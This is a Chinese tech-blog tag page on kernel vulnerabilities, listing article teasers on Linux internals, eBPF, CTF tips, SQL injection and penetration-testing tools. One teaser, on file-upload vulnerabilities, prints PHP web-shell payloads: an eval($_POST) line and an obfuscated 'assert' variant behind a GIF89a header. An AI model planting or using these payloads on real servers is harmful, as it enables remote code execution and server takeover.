内核漏洞

正式开源:使用Kafka FDW 加载数据到 Apache Cloudberry™

它基于开源版的PivotalGreenplumDatabase®衍生而来,但采用了更新的PostgreSQL内核,并具备更先进的企业级功能。Cloudberry可以作为数据仓库使用
·2025-02-19 15:58

国产银河麒麟v10操作系统 添加epel源

国产银河麒麟V10操作系统添加epel源记录一、注意事项二、具体操作三、最后一、注意事项1、操作系内核版本与架构即就是指令集uname-a/uname-r可查看系统内核与指令集,本次我以内核版本4.19.90
菜菜艾·2025-02-19 15:29

浅谈IP地址和网络安全

网络安全sql注入比如sql注入,利用精心构造出来的sql语句,从而获取到你想要的数据库信息,我们一般可以使用一些漏洞扫描工具或者sql注入脚本比如sqlmap进行快速
luck安·2025-02-19 12:08

渗透测试工具包 开源安全测试工具 网络安全工具_网络安全渗透测试工具(1)

msf框架:pocsscan攻击框架Pocsuite攻击框架Beebeeto攻击框架漏洞POC&EXP-ExploitDB官方git版本。
2401_84254011·2025-02-19 11:31

零基础被迫参加CTF比赛?CTF高频解题技巧与经验分享

CTF(CaptureTheFlag)比赛中的高频解题技巧通常涵盖了以下几类技术,涉及从逆向工程、二进制漏洞利用到Web安全、密码学等多个领域。
网络安全宇哥·2025-02-19 11:31

Linux、Docker、Redis常见面试题

它基于Linux内核,可以运行在由Intel,MIPS,HP,IBM,SPARC和Motorola制造的不同硬件平台上。Linux中另一个受欢迎的元素是它的吉祥物,一个名叫Tux的企鹅形象。
百百味·2025-02-19 11:00

青少年编程与数学 02-009 Django 5 Web 编程 23课题、安全性

青少年编程与数学02-009Django5Web编程23课题、安全性一、安全性安全性的定义安全性的关键方面安全性的实现方法安全性的挑战安全性的最佳实践二、安全漏洞1.注入漏洞2.跨站脚本(XSS)漏洞3
明月看潮生·2025-02-19 09:13

基于eBPF的云原生可观测性开源项目Kindling之eBPF基础设施库技术选型

eBPF作为更加现代化的内核技术,相较于内核模块,它的编写难度已经有了较大的降低,但是不可否认对于普通开发者还是有一定门槛。
eBPF_Kindling·2025-02-19 04:34

Python 用pytorch从头写Transformer源码,一行一解释;机器翻译实例代码;Transformer源码解读与实战

为了解决这个问题,Transformer模型被设计出来,内核思想是利用自注意力机制,这样模型可以直接对输入序列的任意两个位置建立直
医学小达人·2025-02-19 03:24

hping3工具介绍及使用方法

扫描5.UDP洪水攻击6.模拟IP欺骗7.自定义数据包8.ICMP路由追踪9.Ping洪水攻击总结hping3是一个强大的命令行网络工具,主要用于发送自定义的TCP/IP数据包,进行网络测试、分析以及漏洞扫描等
璃靡·2025-02-19 02:49

SQL注入技术详解与过滤绕过方法

SQL注入(SQLInjection)是一种常见的Web安全漏洞,指攻击者将恶意的SQL代码插入到应用程序的输入字段中,并通过应用程序发送到数据库进行执行,进而对数据库进行未授权操作。
Cyc1e·2025-02-19 02:45

开发工具篇第二讲:git使用技巧 从基础到进阶(快速入门/高阶用法/git别名/项目实战/gitLab)

它是LinusTorvalds为了帮助管理Linux内核开发而开发的一个开放源码的版本控制软件,git作为版本管理工具,程序员是必须要掌握的。
程序员 jet_qi·2025-02-19 01:38

Dest1ny漏洞库:用友 U8-CRM 系统 ajaxgetborrowdata.php 存在 SQL 注入漏洞

大家好,今天是Dest1ny漏洞库的专题!!会时不时发送新的漏洞资讯!!大家多多关注,多多点赞!!!
Dest1ny(信息安全业务随时dd)·2025-02-19 00:54

深入了解 AppScan 工具的使用:筑牢 Web 应用安全防线

前言IBMAppScan作为一款业界领先的Web应用程序安全测试工具,就像一位专业的“安全卫士”,能够精准高效地识别并协助修复各类安全漏洞,为应用安全保驾护航。
垚垚 Securify 前沿站·2025-02-18 22:01

基于eBPF的智能诊断平台:实现云原生系统的自愈型运维体系

引言:从被动运维到预测性自愈的进化当某电商平台通过eBPF实时诊断系统提前48小时预测到MySQL集群的锁竞争风暴时,其核心是千万级指标粒度的内核状态分析与AI驱动的根因定位算法的结合。
桂月二二·2025-02-18 21:58

新的 OpenWrt RCE 漏洞曝光,影响数百万台网络设备

自2016年下半年的Mirai僵尸网络攻击事件之后,物联网相关的威胁层出不穷,多个在野漏洞被攻击者所利用,多个僵尸网络相继被研究人员发现。
m0_74079109·2025-02-18 18:43

CVE-2024-34527 D-Link DSL-3782命令注入漏洞复现_dsl-3782_a1_eu_1(1)

一、漏洞描述CVE-2022-34527D-LinkDSL-3782v1.03及以下版本被发现包含通过函数byte_4C0160的命令注入漏洞,根据已知公开在cfg_manger文件的代码sub_474c78
2401_84009698·2025-02-18 18:39

TCP协议:深入理解如何收集主机信息

TCP协议:深入理解如何收集主机信息在网络安全领域,信息收集是渗透测试和漏洞评估的首要步骤。TCP协议,作为互联网上应用最广泛的传输层协议之一,为我们提供了丰富的信息收集手段。
小宇python·2025-02-18 17:35

Windows Opencl clSetKernelArg()函数

cl_intclSetKernelArg(cl_kernelkernel,cl_uintarg_index,size_targ_size,constvoid*arg_value)clSetKernelArg()用于为内核的特定参数设置参数值
万能的小裴同学·2025-02-18 17:02

Jupyter notebook和 Jupyter lab内核死亡问题的原因和解决方案

写在前面:之前也遇到过几次内核死亡的问题,也一直没有想解决办法。这里总结一下并提出几个解决办法。
Y1nhl·2025-02-18 16:57

ASan & HWASN 内存漏洞修复实践(一)简介

目录ASAN简介基本概念工作原理优势应用场景HWASanHWASan**与ASan的对比**本文首先简单介绍asan和hwasan的基本概念和区别,后续文章将详细介绍如何在arm平台或x86平台,利用asan/hwasan工具对大型协议软件进行内存问题分析。ASAN简介基本概念ASAN(AddressSanitizer)是一个由Google开发的、用于C和C++程序的快速内存错误检测工具,它能够在
月光技术杂谈·2025-02-18 16:26

Linux 文件 1.4—文件描述符0 1 2(文件操作简述)

文件描述符:关于这些:此处这里讲的十分的详细,清晰,膜拜大佬Linux中有这样一句话,万物皆可文件;1、对于内核而言,所有打开文件都由文件描述符引用,文件描述符是一个非负整数,当打开一个现存文件或者创建一个新文件时
胖胖的小肥猫·2025-02-18 16:56

mac os 使用 qemu-system-arm 进行调试

1.在macos上安装虚拟网络设备tapbrewinstall--casktunnelblick2.下载内核文件和镜像QEMU系统模式仿真,首先我们需要从debian官网下载kernel和image,地址如下
asdhjagsgewuj·2025-02-18 13:54

2024山东省职业院校技能大赛“网络空间安全”赛题及赛题解析(超详细)_2024年山东省职业院校技能大赛中职组网络安全赛项竞赛样题(2)

(非常重要)2、渗透测试基础(一周)①渗透测试的流程、分类、标准②信息收集技术:主动/被动信息搜集、Nmap工具、GoogleHacking③漏洞扫描、漏洞利用、原理,利用方法、工具(MSF
2401_84252820·2025-02-18 13:52

过于依赖chatgpt编程会有哪些弊端?

2.代码质量看运气ChatGPT生成的代码看似能用,但可能有隐藏的bug(比如安全漏洞、性能差),或者和你的实际需求不符。如果完全不检查直接运行,相当于闭着眼睛开车,翻车概率大增
奇偶变不变·2025-02-18 13:22

ASP.NET MVC或者.net Core mvc 页面使用富文本控件的 保存问题

https://blog.csdn.net/leftfist/article/details/69629394目前在做的项目存在XSS安全漏洞
weixin_30949361·2025-02-18 12:14

FreeRTOS第9篇:任务的“快捷消息”——任务通知

文章专栏:深入FreeRTOS内核:从原理到实战的嵌入式开发指南引言:嵌入式系统的“微信私聊”想象你身处一个繁忙的办公室:同事们(任务)需要频繁沟通,传递文件(数据)或确认进度(同步)。
指尖动听知识库·2025-02-18 10:17

基于Knative的无服务器引擎重构:实现毫秒级冷启动的云原生应用浪潮

基于流量预测的预启动算法与内核级资源复用池两大技术创新,正在重新定义Serverless时代的性能边界。IDC最新报告指出,采用该架构的企业资源利用率平均提升至78%,年度计算成本直降320万美元。
桂月二二·2025-02-18 09:37

validation 实现参数校验

参数校验可以防止无效的输入导致的异常或错误,同时也能减少因为无效参数导致的安全漏洞Java中的参数校验可以通过手动编写校验逻辑来实现,但这样会增加代码的复杂度和重复性。
程序员老王wd·2025-02-18 07:24

Jetson Agx Orin平台JP6.0-r36.3版本修复了vi模式下的原始图像损坏(线条伪影)

如果设备是一致的,内核将跳过CPU/设备同步。2.修复方法这里有两个修复方法来解决这个问题。(1)
free-xx·2025-02-18 07:20

Linux内核中的双向链表list_head

双向链表在Linux内核中使用非常多,它是内核各种队列、栈的基础,相关的结构定义和函数均在include/linux/list.h中定义,下面介绍下其原理及使用方法。
ioriwc·2025-02-18 07:50

STM32F4系列微控制器深入应用手册

本文还有配套的精品资源,点击获取简介:STM32F4系列微控制器由意法半导体推出,基于ARMCortex-M4内核,旨在提供高性能和低功耗的嵌入式解决方案。
满天乱走·2025-02-18 05:26

文件上传漏洞常用payload

[极客大挑战2019]UploadGIF89a@eval($_POST[1]);GIF89a$a="a"."s";$b="s"."e"."r"."t";$c=$a.$b;$c($_POST["1"]);
Werqy3·2025-02-18 04:50

网络安全-攻击流程-应用层

应用层攻击针对OSI模型的第七层(应用层),主要利用协议漏洞、业务逻辑缺陷或用户交互弱点,直接威胁Web应用、API、数据库等服务。
星河776(重名区分)·2025-02-18 03:35

选择开发代码审计工具的编程语言需要结合具体场景和技术需求,不同语言在性能、生态、开发效率等方面各有优劣

文本处理:正则表达式和字符串操作能力极强,适合模式匹配(如漏洞规则扫描)。丰富生态:有Bandit、Semgrep(部分组件)等成熟工具的底层支持,可直接调用现成的安全分析库。跨语言支持:通过抽
rockmelodies·2025-02-18 01:13

手搓操作系统-如何创建虚拟磁盘并装载内核(超详细版)

写在前面:本篇是完整的在Linux环境下,创建一个虚拟磁盘,并且将内核安装到磁盘并用虚拟机运行的过程。需要对bootstrap过程有一定的基础知识。
Refulic.·2025-02-17 21:00

网络安全组织架构表 网络安全技术架构

XSS攻击,SQL注入,防盗链,csrf模拟请求,文件上传漏洞,忘记密码漏洞,Api接口幂等,其他问题等等,,,,,,一,什么是XSS?Xss就是javascript脚本攻击,就是在表
网络安全King·2025-02-17 20:54

YashanDB共享集群

本文内容来自YashanDB官网,原文内容请见https://doc.yashandb.com/yashandb/23.3/zh/%E6%A6%82%E5%BF%B5%...共享集群基于YashanDB内核持续演进
·2025-02-17 19:53

供应链协作中的文件安全风险,企业如何防范数据泄露?

典型案例:2025年2月,一家全球知名汽车制造商在与外包厂商共享电池供应链数据时,因安全协议漏洞,导致核心设计方案外泄,竞争对手迅速推出相似产品,直接造成3亿美元的损失。在供应链协作过程中,企业机
够快云库·2025-02-17 18:32

什么是域名劫持?如何防止域名劫持?

域名劫持的常见方式包括窃取域名注册商账户信息、利用社会工程学攻击、或通过DNS服务器漏洞实施攻击。域名劫持的危害用户隐私泄露:用户被引导至恶意网站,可能导致个人
·2025-02-17 10:04

linux--关于Linux的文件IO、虚拟地址空间概念、文件描述符

标准C库IO函数C库的IO函数时跨平台的,它是先通过例如fopen、fread这样的函数去调用对应系统内核例如windows、linux的write或者是read函数进而实现跨平台读写文件。
Bruce Jue·2025-02-17 10:55

《Linux设备驱动开发具体解释(第3版)》进展同步更新

本书已经rebase到开发中的Linux4.0内核,案例多数基于多核CORTEX-A9平台。
weixin_33943836·2025-02-17 09:13

LINUX系统优化

LINUX系统优化企业生产场景中Linux系统的分区方案及内核企业生产场景中Linux系统的分区方案常规的分区方案如下:方案1:针对网站集群架构中的某个节点服务器分区,该服务器上的数据有多份(其他节点也有
敖光 SRE·2025-02-17 09:41

OpenVAS 工具使用全攻略

OpenVAS3.1初始化OpenVAS3.2设置管理员密码3.3启动服务四、使用OpenVAS进行扫描4.1登录Web界面4.2创建扫描任务4.3启动扫描4.4查看扫描结果五、结果分析与处理5.1风险等级评估5.2漏洞修复建议六
垚垚 Securify 前沿站·2025-02-17 08:06

信息安全之网络安全

网络安全大致包含的内容主要有防火墙,入侵检测,漏洞扫描与网络隔离,拒绝服务攻击检测与防御,计算机病毒防治以及×××技术的概念、原理、应用部署等方面。
黑客Jack·2025-02-17 06:20

工控网络安全学习路线

接着学习C/C++,掌握面向过程和面向对象编程的基本概念和技术,为后续的漏洞挖掘和底层分析打下基础。最后学习Python,它在安全领域应用广泛,可用于自动化脚本编写、漏洞扫描和数据分析等。
206333308·2025-02-17 06:50

在软件产品从开发到上线过程中,不同阶段可能出现哪些问题,导致软件最终出现线上bug

在软件产品从开发到上线的全生命周期中,不同阶段都可能因流程漏洞、技术疏忽或人为因素导致线上问题。
测试-东方不败之鸭梨·2025-02-17 06:47

【Linux】【进程】epoll内核实现总结+ET和LT模式内核实现方式

【Linux】【网络】epoll内核实现总结+ET和LT模式内核实现方式1.epoll的工作原理eventpoll结构当某一进程调用epoll_create方法时,Linux内核会创建一个eventpoll
钟离墨笺·2025-02-17 06:43

container_of()理解和使用场景

函数解释:在Linux内核源码中,实现和链表相关的接口list_entry()时,会调用container_of()宏定义,它的作用是:给定结构体中某个成员的地址、该结构体类型和该成员的名字获取这个成员所在的结构体变量的首地址
qq_41072096·2025-02-17 04:03

[008] [RT-Thread学习笔记] 求结构体首地址rt_list_entry函数与字节对齐RT_ALIGN宏

RT-Thread学习笔记rt_list_entry函数源码分析应用示例RT_ALIGN宏源码分析应用示例RT-Thread版本:4.0.5MCU型号:STM32F103RCT6(ARMCortex-M3内核
柯西的彷徨·2025-02-17 04:01
上一页 4 5 6 7 8 9 10 11 下一页
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他